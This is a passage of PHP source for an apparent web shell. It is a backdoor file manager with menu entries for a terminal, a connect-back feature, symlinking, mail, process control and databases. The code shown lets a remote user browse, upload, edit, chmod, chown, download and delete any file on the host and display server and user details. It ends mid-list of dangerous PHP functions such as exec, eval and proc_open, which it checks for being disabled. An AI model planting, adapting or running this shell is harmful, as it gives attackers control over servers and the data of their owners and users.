return sprintf ( '%s [%s]' , $info , substr ( decoct ( $perms ), 2 ));
function GetFileSize ( $x )
$x = abs ( $x );
$size = array ( 'B' , 'KB' , 'MB' , 'GB' , 'TB' , 'PB' , 'EB' , 'ZB' , 'YB' );
$exp = $x ? floor ( log ( $x ) / log ( 1024 )) : 0 ;
return sprintf ( '%.2f ' . $size [ $exp ],( $x / pow ( 1024 , floor ( $exp ))));
function GetUser ( $x )
if ( function_exists ( 'posix_getpwuid' ) && function_exists ( 'posix_getgrgid' ))
$uid = posix_getpwuid ( posix_getuid ());
$gid = posix_getgrgid ( posix_getgid ());
switch ( $x )
case 'usr' : return $uid [ 'name' ]; break ;
case 'uid' : return $uid [ 'uid' ]; break ;
case 'grp' : return $gid [ 'name' ]; break ;
case 'gid' : return $gid [ 'gid' ]; break ;
switch ( $x )
case 'usr' : return get_current_user (); break ;
case 'uid' : return getmyuid (); break ;
case 'grp' : return " ? " ; break ;
case 'gid' : return getmygid (); break ;
function GetOwnerGroup ( $x )
if ( Unix ())
if ( function_exists ( 'posix_getpwuid' ) && function_exists ( 'posix_getgrgid' ))
$user = posix_getpwuid ( fileowner ( $x ));
$group = posix_getgrgid ( filegroup ( $x ));
return sprintf ( '%s:%s' , $user [ 'name' ], $group [ 'name' ]);
return " ?:? " ;
function GetFileOwnerGroup ( $x )
if ( Unix ())
if ( function_exists ( 'posix_getpwuid' ) && function_exists ( 'posix_getgrgid' ))
$user = posix_getpwuid ( fileowner ( $x ));
$group = posix_getgrgid ( filegroup ( $x ));
return sprintf ( '%s:%s/%s:%s' , $user [ 'name' ], $user [ 'uid' ], $group [ 'name' ], $group [ 'gid' ]);
return " ?:?/?:? " ;
function GetSafeMode ()
if ( strtolower ( ini_get ( " safe_mode " )) == 'on' )
$safemod = " <font class='off'>ON</font> " ;
$safemod = " <font class='on'>OFF</font> " ;
return $safemod ;
function MapDirectory ( $x )
$map = " " ;
$d = str_replace ( " \\ " , _ , $x );
if ( empty ( $d ))
$d = realpath ( " . " );
elseif ( realpath ( $d ))
$d = realpath ( $d );
$d = str_replace ( " \\ " , _ , $d );
if ( substr ( $d , - 1 ) != _ )
$d .= _ ;
$d = str_replace ( " \\ \\ " , " \\ " , $d );
$pd = $e = explode ( _ , substr ( $d , 0 , - 1 ));
$i = 0 ;
foreach ( $pd as $b )
$t = " " ;
$j = 0 ;
foreach ( $e as $r )
$t .= $r . _ ;
if ( $j == $i )
break ;
$j ++ ;
$map .= " <a href= \" ?d= " . urle ( $t ) . " \" > " . htmlspecialchars ( $b ) . " </a> " . _ ;
$i ++ ;
return rtrim ( $map , _ );
function MapDrive ( $x )
if ( ! Unix ())
$v = explode ( " \\ " , $x );
$v = $v [ 0 ];
$l = " " ;
foreach ( range ( " A " , " Z " ) as $lt )
$drive = is_dir ( $lt . " : \\ " );
if ( $drive )
$l .= " <a href= \" ?d= " . urle ( $lt . " : \\ " ) . " \" >[ " ;
if ( strtolower ( $lt . ':' ) != strtolower ( $v ))
$l .= $lt ;
$l .= " <font color= \" orange \" ><b> " . $lt . " </b></font> " ;
$l .= " ]</a> " ;
return $l ;
function MainMenu ()
$menu = array (
" ExpL " => " ?d= " . urle ( getcwd ()),
" ★ Sec. " => " ?x=secure " ,
" Info " => " ?x=info " ,
" Database " => " ?x=db " ,
" Terminal " => " ?x=terminal " ,
" Connect " => " ?x=connect " ,
" .Htaccess " => " ?x=htaccess " ,
" PHP " => " ?x=php " ,
" Perl/CGI " => " ?x=perl " ,
" Mail " => " ?x=mail " ,
" Process " => " ?x=process " ,
" Shells " => " ?x=shells " ,
" Symlink " => " ?x=symlink " ,
" ♛ Tools " => " ?z " ,
" Account " => " ?x=account " ,
" Update " => " ?x=update " ,
" Logout " => " ?x=logout "
$nu = " " ;
foreach ( $menu as $key => $val )
$idxkey = substr ( $val , 1 , 1 );
$idxval = substr ( $val , 3 );
$active = any ( $idxkey , $_REQUEST ) && $_REQUEST [ $idxkey ] == $idxval ? " class='active' " : " " ;
if ( $key == " Logout " )
$nu .= " <li><a " . $active . " href=' " . $val . " ' onclick= \" return confirm('Bye !'); \" > " . $key . " </a></li> " ;
$nu .= " <li><a " . $active . " href=' " . $val . " '> " . $key . " </a></li> " ;
return $nu ;
function MenuTools ( $x )
global $menu_tools ;
$ol = " <div class='menu-tools'><ul> " ;
$menu_tools = $x ;
foreach ( $menu_tools as $k => $v )
$active = $_REQUEST [ 'z' ] == $k ? " class='active' " : " " ;
$ol .= " <li><a " . $active . " href='?z= " . $k . " '>[ " . $v [ 'title' ] . " ]</a></li> " ;
$ol .= " </ul></div> " ;
return $ol ;
printf ( " <div id='header'>
< div class = 'header-left' >
< div id = 'info' >
< font class = 'on' > [ % s ] </ font >< br >
< font class = 'on' > [ % s ] </ font >< br >
[ < a href = '//%s' target = '_blank' >% s </ a > ] : < font class = 'on' >% s :% s </ font > [ % s ] : < font class = 'on' >% s :% s </ font >< br >
[ USER ] : < font class = 'on' >% s ( % s ) </ font > [ GROUP ] : < font class = 'on' >% s ( % s ) </ font >< br >
[ HDD ] : < font class = 'on' >% s </ font > / < font class = 'on' >% s </ font >< br >
[ PHPMODE ] : < font class = 'on' >% s </ font >< br >
[ SAFEMODE ] : < font class = 'on' >% s </ font >< br >
</ div >
</ div >
< div class = 'header-right' >
< a href = '%s' >< div id = 'logo' >
< h1 id = 'title' >% s </ h1 >
< div class = 'line' ></ div >
< h2 id = 'subtitle' >% s </ h2 >
</ div ></ a >
</ div >
< div class = 'clr' ></ div >
</ div >
< div id = 'container' >
< div class = 'menu' >
< ul >% s </ ul >
</ div >
< div class = 'menu-directory' >
< div class = 'map-switch' >
< input type = 'submit' name = 'map-switch' value = '♞' onclick = 'mapSwitch(\"map1\",\"map2\")' >
</ div >
< div class = 'map1' id = 'map1' style = 'display:inline-block' >
< span style = 'margin-right:5px' >% s </ span >
< span style = 'margin-right:5px' >% s </ span >
</ div >
< div class = 'map2' id = 'map2' style = 'display:none' >
< form method = 'post' id = 'map2-form' onsubmit = 'document.getElementById(\"map2-form\").action=\"?g=\" + encodeURI(document.getElementById(\"map2-input\").value);' >
< input type = 'text' value = '%s' id = 'map2-input' />
< input type = 'submit' value = 'Go' >
</ form >
</ div >
</ div >
< div class = 'content' > " ,
php_uname (), server_software ,
server_name , server_name , gethostbyname ( http_host ), server_port ,
B64D ( $account [ 0 ]), remote_addr , remote_port ,
GetUser ( " usr " ), GetUser ( " uid " ), GetUser ( " grp " ), GetUser ( " gid " ),
GetFileSize ( @ disk_free_space ( $dir )), GetFileSize ( @ disk_total_space ( $dir )),
php_sapi_name (), GetSafeMode (), php_self , $config [ 'title' ], $config [ 'subtitle' ],
MainMenu (), MapDrive ( $map ), MapDirectory ( $map ), $map
if ( any ( " g " , $_REQUEST ))
$g = $_REQUEST [ 'g' ];
if ( is_dir ( $g ))
header ( 'location:' . php_self . '?d=' . urle ( $g ));
elseif ( is_file ( $g ) || is_link ( $g ))
header ( 'location:' . php_self . '?a=v&r=' . urle ( $g ));
header ( 'location:' . php_self );
if ( any ( " d " , $_REQUEST ) || request_uri === script_name )
$_SESSION [ 'c' ] = urle ( $dir );
if ( any ( " file " , $_REQUEST ) && $_REQUEST [ 'file' ] == " New File " )
$file = trim ( $dir . _ . $_REQUEST [ 'what' ]);
if ( file_exists ( $file ))
printf ( " <center style='margin-bottom:10px'><b class='off'>Can't create New File!</b></center> " );
$mf =@ fopen ( $file , " w " );
fclose ( $mf );
header ( " location: " . php_self . " ?a=e&r= " . urle ( $file ));
if ( any ( " directory " , $_REQUEST ) && $_REQUEST [ 'directory' ] == " New Dir " )
$dire = trim ( $_REQUEST [ 'what' ]);
@ chdir ( $dir );
if ( !@ mkdir ( $dire ))
printf ( " <center style='margin-bottom:10px'><b class='off'>Can't create New Directory!</b></center> " );
printf ( " <center style='margin-bottom:10px'><b class='on'>Directory '%s' Created on %s</b></center> " , $dire , GetFileTime ( $dir . _ . $dire , 'create' ));
if ( any ( " upload " , $_REQUEST ) && $_REQUEST [ 'upload' ] == " Upload " )
$upload = $dir . _ . trim ( basename ( $_FILES [ " what " ][ " name " ]));
if ( move_uploaded_file ( $_FILES [ " what " ][ " tmp_name " ], $upload ))
printf ( " <center style='margin-bottom:10px'><b class='on'>File %s has been uploaded</b></center> " , basename ( $_FILES [ " what " ][ " name " ]));
printf ( " <center style='margin-bottom:10px'><b class='off'>✕ Can't upload new file! ✕</b></center> " );
if ( $handle =@ opendir ( $dir ))
$reads = array ();
$count_dirs = 0 ;
$count_files = 0 ;
while ( false !== ( $file = readdir ( $handle )))
$filedir = rtrim ( $dir , _ ) . _ . $file ;
$updir = substr ( $dir , 0 , strrpos ( $dir , _ ));
if ( strlen ( $updir ) <= 2 ) $updir = $updir . _ ;
$type = GetFileType ( $filedir );
$size = GetFileSize ( @ filesize ( $filedir ));
$last = GetFileTime ( $filedir , " modify " );
$perm = GetFilePerm ( $filedir );
$owner = GetOwnerGroup ( $filedir );
$mime =@ mime_content_type ( $filedir );
$view = " " ;
if ( strpos ( $mime , 'image' ) !== false )
$view = " ?a=v&w=i&r= " . urle ( $filedir );
elseif ( strpos ( $mime , 'video' ) !== false )
$view = " ?a=v&w=v&r= " . urle ( $filedir );
elseif ( strpos ( $mime , 'audio' ) !== false )
$view = " ?a=v&w=a&r= " . urle ( $filedir );
$view = " ?a=v&r= " . urle ( $filedir );
if ( $file == " . " )
$reads [] = " <tr sorttable_customkey='2'><td><center><input type='checkbox' name='nochk[]' value=' " . urle ( $dir ) . " '/></center></td><td><img src=''/> <a title='Current Directory' href='?d= " . urle ( $dir ) . " '>.</a></td><td><center> " . strtoupper ( $type ) . " </center></td><td><center> " . $size . " </center></td><td><center> " . $perm . " </center></td><td><center> " . $owner . " </center></td><td><center> " . $last . " </center></td><td><a class='action' href='?a=x&r= " . urle ( $dir ) . " ' onclick= \" return confirm('Delete Directory [ / " . basename ( $dir ) . " ] ?'); \" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r= " . urle ( $dir ) . " ' title='Modify Folder'>ℳ</a></td></tr> " ;
elseif ( $file == " .. " )
$reads [] = " <tr sorttable_customkey='1'><td><center><input type='checkbox' name='nochk[]' value=' " . urle ( $updir ) . " '/></center></td><td><img src=''/> <a title='Parent Directory' href='?d= " . urle ( $updir ) . " '> " . $file . " </a></td><td><center> " . strtoupper ( $type ) . " </center></td><td><center> " . $size . " </center></td><td><center> " . $perm . " </center></td><td><center> " . $owner . " </center></td><td><center> " . $last . " </center></td><td><a class='action' href='?a=x&r= " . urle ( $updir ) . " ' onclick= \" return confirm('Delete Directory [ / " . basename ( $updir ) . " ] ?'); \" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r= " . urle ( $updir ) . " ' title='Modify Folder'>ℳ</a></td></tr> " ;
if ( $type == " dir " )
$reads [] = " <tr sorttable_customkey='3'><td><center><input type='checkbox' name='chk[]' value=' " . urle ( $filedir ) . " ' /></center></td><td><img src=''/> <a title='Open Directory' href='?d= " . urle ( $filedir ) . " '> " . $file . " </a></td><td><center> " . strtoupper ( $type ) . " </center></td><td><center> " . $size . " </center></td><td><center> " . $perm . " </center></td><td><center> " . $owner . " </center></td><td><center> " . $last . " </center></td><td><a class='action' href='?a=x&r= " . urle ( $filedir ) . " ' onclick= \" return confirm('Delete Directory [ / " . basename ( $filedir ) . " ] ?'); \" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r= " . urle ( $filedir ) . " ' title='Modify Folder'>ℳ</a></td></tr> " ;
$count_dirs ++ ;
$reads [] = " <tr sorttable_customkey='4'><td><center><input type='checkbox' name='chk[]' value=' " . urle ( $filedir ) . " ' /></center></td><td><img src=''> <a title='View File' href=' " . $view . " '> " . $file . " </a></td><td><center> " . strtoupper ( $type ) . " </center></td><td><center> " . $size . " </center></td><td><center> " . $perm . " </center></td><td><center> " . $owner . " </center></td><td><center> " . $last . " </center></td><td><a class='action' href='?a=e&r= " . urle ( $filedir ) . " ' title='Modify File'>ℳ</a> <a class='action' href='?a=x&r= " . urle ( $filedir ) . " ' onclick= \" return confirm('Delete Filename [ " . basename ( $filedir ) . " ] ?'); \" title='Delete File'>✘</a> <a class='action' href='?a=d&r= " . urle ( $filedir ) . " ' title='Download File'>➥</a></td></tr> " ;
$count_files ++ ;
sort ( $reads );
$filesdirs = " " ;
foreach ( $reads as $read )
$filesdirs .= $read ;
printf ( " <div id='action'>
< table >< tr >
< td >< form class = 'new' method = POST action = '?d=%s' >
< input name = 'what' type = 'text' />< input type = 'submit' name = 'file' value = 'New File' />
</ form ></ td >
< td >< form class = 'new' method = POST action = '?d=%s' >
< input name = 'what' type = 'text' />< input type = 'submit' name = 'directory' value = 'New Dir' />
</ form ></ td >
< td >< form class = 'new' method = POST action = '?x=find' >
< input type = 'text' name = 'find-value' id = 'find-action' />< input type = 'submit' name = 'find-button' value = 'Find' />
</ form ></ td >
< td >< form class = 'new' method = POST action = '?d=%s&x=upload' enctype = 'multipart/form-data' >
< input name = 'what' type = 'file' class = 'inputfile' />< input type = 'submit' name = 'upload' value = 'Upload' />
</ form ></ td >
</ tr ></ table >
</ div >
< div id = 'home' >
< form name = 'files' method = POST action = '?x=action' onclick = 'checkCount(\"count\")' >
< table class = 'table sortable' >
< thead >
< tr >
< th class = 'sorttable_nosort' >< input type = 'checkbox' name = 'check-all' onclick = 'checkAll()' /></ th >
< th class = 'sorttable_numeric' > Name </ th >
< th > Type </ th >
< th > Size </ th >
< th > Perms </ th >
< th > Owner : Group </ th >
< th > Modified </ th >
< th > Act .</ th >
</ tr >
</ thead >
< tbody >% s </ tbody >
< tFoot >
< tr >
< td colspan = '8' > [ < span id = 'count' > 0 </ span > ] Selected | Dir 's: [%s] File' s : [ % s ] </ td >
</ tr >
</ tFoot >
</ table >
< select name = 'action-value' >
< option value = 'copy' > Copy </ option >
< option value = 'move' > Move </ option >
< option value = 'delete' > Delete </ option >
< option value = 'zip' > Archive ( zip ) </ option >
< option value = 'unzip' > Extract to ( zip ) </ option >
</ select >
< input type = 'submit' value = 'Action' name = 'action-button' />
</ form >
</ div > " ,
urle ( $dir ),
urle ( $dir ),
urle ( $dir ),
$filesdirs ,
$count_dirs ,
closedir ( $handle );
print " <center style='margin-bottom:10px'><b class='off'>Can't Open Location</b></center> " ;
if ( any ( " r " , $_REQUEST ))
if ( file_exists ( urld ( $_REQUEST [ " r " ])))
$file = strval ( urld ( $_REQUEST [ " r " ]));
$status = any ( " status " , $_SESSION ) ? $_SESSION [ 'status' ] : " " ;
$back = php_self . " ?d= " . urle ( $dir );
printf ( " <div class='divide'>
< div class = 'divide-left' >
< table class = 'table' >
< tr >< td > Name </ td >< td >% s </ td ></ tr >
< tr >< td > Size </ td >< td >% s </ td ></ tr >
< tr >< td > Permission </ td >< td >% s </ td ></ tr >
< tr >< td > Create time </ td >< td >% s </ td ></ tr >
< tr >< td > Last modified </ td >< td >% s </ td ></ tr >
< tr >< td > Last accessed </ td >< td >% s </ td ></ tr >
</ table >
</ div >
< div class = 'divide-right' >
< table class = 'table' >
< tr >< td > MIME </ td >< td >% s </ td ></ tr >
< tr >< td > Owner / Group </ td >< td >% s </ td ></ tr >
< tr >< td > MD5 </ td >< td >% s </ td ></ tr >
< tr >< td > SHA1 </ td >< td >% s </ td ></ tr >
</ table >
</ div >
</ div > " ,
basename ( $file ),
GetFileSize ( @ filesize ( $file )),
GetFilePerm ( $file ),
GetFileTime ( $file , " create " ),
GetFileTime ( $file , " modify " ),
GetFileTime ( $file , " access " ),
mime_content_type ( $file ),
GetFileOwnerGroup ( $file ),
@ md5_file ( $file ),
@ sha1_file ( $file )
if ( is_file ( $file ) || is_link ( $file ))
$menu = array (
" Back " => " ?a=b&r= " ,
" Edit " => " ?a=e&r= " ,
" View " => " ?a=v&r= " ,
" Copy " => " ?a=cp&r= " ,
" Move " => " ?a=mv&r= " ,
" Download " => " ?a=d&r= " ,
" Hexdump " => " ?a=h&r= " ,
" Chmod " => " ?a=c&r= " ,
" Chown " => " ?a=cwn&r= " ,
" Chgrp " => " ?a=cgp&r= " ,
" Touch " => " ?a=t&r= " ,
" Rename " => " ?a=r&r= " ,
" Delete " => " ?a=x&r= "
elseif ( is_dir ( $file ))
$menu = array (
" Back " => " ?a=b&r= " ,
" Chmod " => " ?a=c&r= " ,
" Chown " => " ?a=cwn&r= " ,
" Chgrp " => " ?a=cgp&r= " ,
" Touch " => " ?a=t&r= " ,
" Rename " => " ?a=r&r= " ,
" Delete " => " ?a=x&r= "
$nu = " " ;
foreach ( $menu as $key => $val )
$idxkey = substr ( $val , 1 , 1 );
$idxval = substr ( $val , 3 , strpos ( $val , '&' ) - 3 );
$active = any ( $idxkey , $_REQUEST ) && $_REQUEST [ $idxkey ] == $idxval ? " class='active' " : " " ;
if ( $key == " Delete " )
$nu .= " <li><a " . $active . " href=' " . $val . urle ( $file ) . " ' onclick= \" return confirm('Delete Filename [ " . basename ( $file ) . " ] ?'); \" > " . $key . " </a></li> " ;
elseif ( $key == " Back " )
$nu .= " <li><a " . $active . " href=' " . $back . " '> " . $key . " </a></li> " ;
$nu .= " <li><a " . $active . " href=' " . $val . urle ( $file ) . " '> " . $key . " </a></li> " ;
printf ( " <div class='menu'>
< ul >% s </ ul >
</ div > " , $nu );
if ( $_REQUEST [ 'a' ] == 'e' )
$source = " " ;
if ( filesize ( $file ) > 5242880 )
$source .= " Lazy to Read more than 5MB Files " ;
$open = fopen ( $file , 'r' );
if ( $open )
while ( ! feof ( $open ))
$source .= htmlentities ( fread ( $open ,( 1024 * 4 )));
fclose ( $open );
printf ( " <form class='frmsource' method='post'>
< textarea id = 'sourcefocus' name = 'sourcecode' rows = '25' cols = '100' >% s </ textarea >
< input type = 'Submit' value = 'Save file' name = 'save' />
< label >% s </ label >
</ form > " , $source , $status );
if ( any ( " status " , $_SESSION )) unset ( $_SESSION [ 'status' ]);
if ( any ( " save " , $_REQUEST ))
$new_source = $_REQUEST [ 'sourcecode' ];
if ( function_exists ( " chmod " )) chmod ( $file , 0755 );
$source_edit = fopen ( $file , 'w+' );
$tulis = fwrite ( $source_edit , $new_source );
fclose ( $source_edit );
if ( $tulis )
$_SESSION [ 'status' ] = " File Saved ! " . GetFileTime ( $file , " modify " ) . " | " . GetFileSize ( filesize ( $file ));
$_SESSION [ 'status' ] = " Whoops, something went wrong... " ;
header ( " location: " . php_self . " ?a=e&r= " . urle ( $file ));
if ( $_REQUEST [ 'a' ] == 'r' )
printf ( " <form class='new' method='post'>
< input type = 'text' name = 'name' value = '%s' />
< input type = 'Submit' value = 'Rename' name = 'rename' />
< label >% s </ label >
</ form > " ,basename( $file ), $status );
if ( any ( " status " , $_SESSION )) unset ( $_SESSION [ 'status' ]);
if ( any ( " rename " , $_REQUEST ))
$path = pathinfo ( trim ( $file ));
$newname = $path [ 'dirname' ] . _ . trim ( $_REQUEST [ 'name' ]);
if ( ! rename ( trim ( $file ), $newname ))
$_SESSION [ 'status' ] = 'Whoops, something went wrong...' ;
$_SESSION [ 'status' ] = 'Renamed file with success' ;
header ( " location: " . php_self . " ?a=r&r= " . urle ( $newname ));
if ( $_REQUEST [ 'a' ] == 'c' )
printf ( " <form class='new' method='post'>
< input type = 'text' name = 'octal' value = '%s' />
< input type = 'Submit' value = 'Chmod' name = 'chmod' />
< label >% s </ label >
</ form > " ,substr(decoct(fileperms( $file )),2), $status );
if ( any ( " status " , $_SESSION )) unset ( $_SESSION [ 'status' ]);
if ( any ( " chmod " , $_REQUEST ))
$octal = octdec ( $_REQUEST [ 'octal' ]);
if ( ! chmod ( trim ( $file ), $octal ))
$_SESSION [ 'status' ] = 'Whoops, something went wrong...' ;
$_SESSION [ 'status' ] = 'Chmod file with success' ;
header ( " location: " . php_self . " ?a=c&r= " . urle ( $file ));
if ( $_REQUEST [ 'a' ] == 'cwn' )
$own = '' ;
if ( function_exists ( 'posix_getpwuid' ))
$user = posix_getpwuid ( fileowner ( $x ));
$own = $user [ 'name' ];
printf ( " <form class='new' method='post'>
< input type = 'text' name = 'own' value = '%s' />
< input type = 'Submit' value = 'Chown' name = 'chown' />
< label >% s </ label >
</ form > " , $own , $status );
if ( any ( " status " , $_SESSION )) unset ( $_SESSION [ 'status' ]);
if ( any ( " chown " , $_REQUEST ))
$own = $_REQUEST [ 'own' ];
if ( ! chown ( trim ( $file ), $own ))
$_SESSION [ 'status' ] = 'Whoops, something went wrong...' ;
$_SESSION [ 'status' ] = 'Chown file with success' ;
header ( " location: " . php_self . " ?a=cwn&r= " . urle ( $file ));
if ( $_REQUEST [ 'a' ] == 'cgp' )
$grp = '' ;
if ( function_exists ( 'posix_getgrgid' ))
$group = posix_getgrgid ( filegroup ( $x ));
$grp = $group [ 'name' ];
printf ( " <form class='new' method='post'>
< input type = 'text' name = 'grp' value = '%s' />
< input type = 'Submit' value = 'Chgrp' name = 'chgrp' />
< label >% s </ label >
</ form > " , $grp , $status );
if ( any ( " status " , $_SESSION )) unset ( $_SESSION [ 'status' ]);
if ( any ( " chgrp " , $_REQUEST ))
$grp = $_REQUEST [ 'grp' ];
if ( ! chgrp ( trim ( $file ), $grp ))
$_SESSION [ 'status' ] = 'Whoops, something went wrong...' ;
$_SESSION [ 'status' ] = 'Chgrp file with success' ;
header ( " location: " . php_self . " ?a=cgp&r= " . urle ( $file ));
if ( $_REQUEST [ 'a' ] == 't' )
printf ( " <form class='new' method='post'>
< input type = 'text' name = 'time' value = '%s' />
< input type = 'Submit' value = 'Touch' name = 'touch' />
< label >% s </ label >
</ form > " ,GetFileTime( $file , " modify " ), $status );
if ( any ( " status " , $_SESSION )) unset ( $_SESSION [ 'status' ]);
if ( any ( " touch " , $_REQUEST ))
$time = $_REQUEST [ 'time' ];
if ( ! touch ( trim ( $file ), strtotime ( $time )))
$_SESSION [ 'status' ] = 'Whoops, something went wrong...' ;
$_SESSION [ 'status' ] = 'Touched file with success' ;
header ( " location: " . php_self . " ?a=t&r= " . urle ( $file ));
if ( $_REQUEST [ 'a' ] == 'v' )
printf ( " <div class='menu'>
< ul >
< li >< a href = '?a=v&r=%s' > Source </ a ></ li >
< li >< a href = '?a=v&w=f&r=%s' > iFrame </ a ></ li >
< li >< a href = '?a=v&w=i&r=%s' > Image </ a ></ li >
< li >< a href = '?a=v&w=v&r=%s' > Video </ a ></ li >
< li >< a href = '?a=v&w=a&r=%s' > Audio </ a ></ li >
</ ul >
</ div > " ,
urle ( $file ), urle ( $file ),
urle ( $file ), urle ( $file ),
urle ( $file ));
if ( is_readable ( $file ))
if ( any ( " w " , $_REQUEST ))
$url = GetUrlFromPath ( $file );
$type = pathinfo ( $url )[ 'extension' ];
if ( $_REQUEST [ 'w' ] == 'f' )
printf ( " <center><iframe src='%s' width='100%%' height='325' frameBorder='0'>Suck</iframe><a href='%s' target='_blank'>--> New Tab <--</a></center> " , $url , $url );
if ( $_REQUEST [ 'w' ] == 'i' )
printf ( " <center><img src='%s' alt=' Not Image'/></center> " , $url );
if ( $_REQUEST [ 'w' ] == 'v' )
printf ( " <center><video width='640' height='320' controls><source src='%s' type='video/%s'>Suck</video></center> " , $url , $type );
if ( $_REQUEST [ 'w' ] == 'a' )
printf ( " <center><audio controls><source src='%s' type='audio/%s'>Suck</audio></center> " , $url , $type );
if ( filesize ( $file ) > 5242880 )
printf ( " Lazy to Read more than 5MB Files " );
$code = highlight_file ( $file , true );
printf ( " <div class='highlight'>%s</div> " , $code );
if ( $_REQUEST [ 'a' ] == 'h' )
$c = file_get_contents ( $file );
$n = 0 ;
$h = array ( '00000000<br>' , '' , '' );
$len = strlen ( $c );
for ( $i = 0 ; $i < $len ; ++ $i )
$h [ 1 ] .= sprintf ( '%02X' , ord ( $c [ $i ])) . ' ' ;
switch ( ord ( $c [ $i ]))
case 0 : $h [ 2 ] .= ' ' ; break ;
case 9 : $h [ 2 ] .= ' ' ; break ;
case 10 : $h [ 2 ] .= ' ' ; break ;
case 13 : $h [ 2 ] .= ' ' ; break ;
default : $h [ 2 ] .= $c [ $i ]; break ;
$n ++ ;
if ( $n == 32 )
$n = 0 ;
if ( $i + 1 < $len )
$h [ 0 ] .= sprintf ( '%08X' , $i + 1 ) . '<br>' ;
$h [ 1 ] .= '<br>' ;
$h [ 2 ] .= " \n " ;
printf ( "
< div id = 'hexdump' >
< table class = 'hexdump' >
< tr >
< td >< pre >% s </ pre ></ td >
< td >< pre >% s </ pre ></ td >
< td >< pre >% s </ pre ></ td >
</ tr >
</ table >
</ div > " , $h[0] , $h[1] ,htmlspecialchars( $h[2] ));
if ( $_REQUEST [ 'a' ] == 'cp' || $_REQUEST [ 'a' ] == 'mv' )
printf ( " <form class='new' method='post'>
< input type = 'text' name = 'file-dest' value = '%s' />
< input type = 'Submit' value = '%s' name = 'submit' />
< label >% s </ label >
</ form > " , $file ,( $_REQUEST['a'] =='cp'?'Copy':'Move'), $status );
if ( any ( " status " , $_SESSION )) unset ( $_SESSION [ 'status' ]);
if ( any ( " submit " , $_REQUEST ))
$source = $file ;
$dest = $_REQUEST [ 'file-dest' ];
if ( ! file_exists ( $dest ))
if ( $_REQUEST [ 'a' ] == 'cp' )
if ( ! copy ( trim ( $source ), trim ( $dest )))
$_SESSION [ 'status' ] = 'Whoops, cannot copying...' ;
$_SESSION [ 'status' ] = " Copy file with success <a href=?a=v&r=' " . urle ( $dest ) . " '>' " . basename ( $dest ) . " '</a> " ;
elseif ( $_REQUEST [ 'a' ] == 'mv' )
if ( ! copy ( trim ( $source ), trim ( $dest )))
$_SESSION [ 'status' ] = 'Whoops, cannot moving...' ;
if ( Remove ( $source ))
$_SESSION [ 'status' ] = " Move file with success " ;
$file = $dest ;
$_SESSION [ 'status' ] = 'Whoops, just copying...' ;
$_SESSION [ 'status' ] = " Whoops, File was Exists <a href=?a=v&r=' " . urle ( $dest ) . " '>' " . basename ( $dest ) . " '</a> " ;
if ( $_REQUEST [ 'a' ] == 'cp' )
header ( " location: " . php_self . " ?a=cp&r= " . urle ( $file ));
elseif ( $_REQUEST [ 'a' ] == 'mv' )
header ( " location: " . php_self . " ?a=mv&r= " . urle ( $file ));
if ( $_REQUEST [ 'a' ] == 'd' )
if ( file_exists ( $file ))
header ( 'Cache-Control:must-revalidate,post-check=0,pre-check=0' );
header ( 'Content-Disposition:attachment;filename=' . basename ( $file ));
header ( 'Content-Type:application/octet-stream' );
header ( 'Content-Description:File Transfer' );
header ( 'Content-Transfer-Encoding:binary' );
header ( 'Content-Length:' . filesize ( $file ));
header ( 'Pragma:public' );
header ( 'Expires:0' );
ob_clean ();
readfile ( $file );
exit ;
if ( $_REQUEST [ 'a' ] == 'x' )
if ( file_exists ( $file ))
if ( Remove ( $file ))
header ( " location: " . $back );
print '<font class="off">Cannot Delete</font>' ;
print '<font class="off">File Not Found</font>' ;
if ( any ( " x " , $_REQUEST ))
if ( $_REQUEST [ 'x' ] == " logout " )
session_destroy ();
session_regenerate_id ();
header ( 'location:' . php_self );
if ( $_REQUEST [ 'x' ] == " secure " )
$disable_functions = array_filter ( array_map ( 'trim' , explode ( ',' , ini_get ( " disable_functions " ))));
$security = array ( '_xyec' , 'allow_url_fopen' , 'allow_url_include' , 'apache_child_terminate' , 'apache_get_modules' , 'apache_getenv' ,
'apache_note' , 'apache_setenv' , 'base64_decode' , 'chdir' , 'chgrp' , 'chmod' , 'chown' , 'curl_exec' , 'curl_multi_exec' , 'dbase_open' ,
'dbmopen' , 'define_syslog_variables' , 'disk_free_space' , 'disk_total_space' , 'diskfreespace' , 'dl' , 'dlopen' , 'escapeshellarg' ,
'escapeshellcmd' , 'eval' , 'exec' , 'extract' , 'filepro' , 'filepro_retrieve' , 'filepro_rowcount' , 'fopen_with_path' , 'fp' , 'fput' ,
'fputs' , 'ftp_connect' , 'ftp_exec' , 'ftp_get' , 'ftp_login' , 'ftp_nb_fput' , 'ftp_put' , 'ftp_raw' , 'ftp_rawlist' , 'geoip_open' ,
'get_cfg_var' , 'get_current_user' , 'get_num_redirects' , 'getcwd' , 'getenv' , 'getlastmo' , 'getmygid' , 'getmyinode' , 'getmypid' ,
'getmyuid' , 'getrusage' , 'gzinflate' , 'gzuncompress' , 'highlight_file' , 'hpAds_xmlrpcEncode' , 'ini_alter' , 'ini_get_all' ,
'ini_restore' , 'ini_set' , 'inject_code' , 'leak' , 'link' , 'listen' , 'mainwork' , 'mb_send_mail' , 'mkdir' , 'mkfifo' , 'move_uploaded_file' ,
'mysql_list_dbs' , 'mysql_pconnect' , 'openlog' , 'parse_ini_file' , 'passthru' , 'pcntl_alarm' , 'pcntl_exec' , 'pcntl_fork' ,
'pcntl_get_last_error' , 'pcntl_getpriority' , 'pcntl_setpriority' , 'pcntl_signal' , 'pcntl_signal_dispatch' , 'pcntl_sigprocmask' ,
'pcntl_sigtimedwait' , 'pcntl_sigwaitinfo' , 'pcntl_strerrorp' , 'pcntl_wait' , 'pcntl_waitpid' , 'pcntl_wexitstatus' , 'pcntl_wifexited' ,
'pcntl_wifsignaled' , 'pcntl_wifstopped' , 'pcntl_wstopsig' , 'pcntl_wtermsig' , 'pfsockopen' , 'phpAds_XmlRpc' , 'phpAds_remoteInfo' ,
'phpAds_xmlrpcDecode' , 'phpAds_xmlrpcEncode' , 'php_uname' , 'phpinfo' , 'popen' , 'posix_getgrgid' , 'posix_getlogin' , 'posix_getpwuid' ,
'posix_kill' , 'posix_mkfifo' , 'posix_setpgid' , 'posix_setsid' , 'posix_setuid' , 'posix_ttyname' , 'posix_uname' , 'posixc' , 'proc_close' ,
'proc_get_stats' , 'proc_get_status' , 'proc_nice' , 'proc_open' , 'proc_terminate' , 'ps_aux' , 'putenv' , 'readlink' , 'rename' , 'rmdir' ,
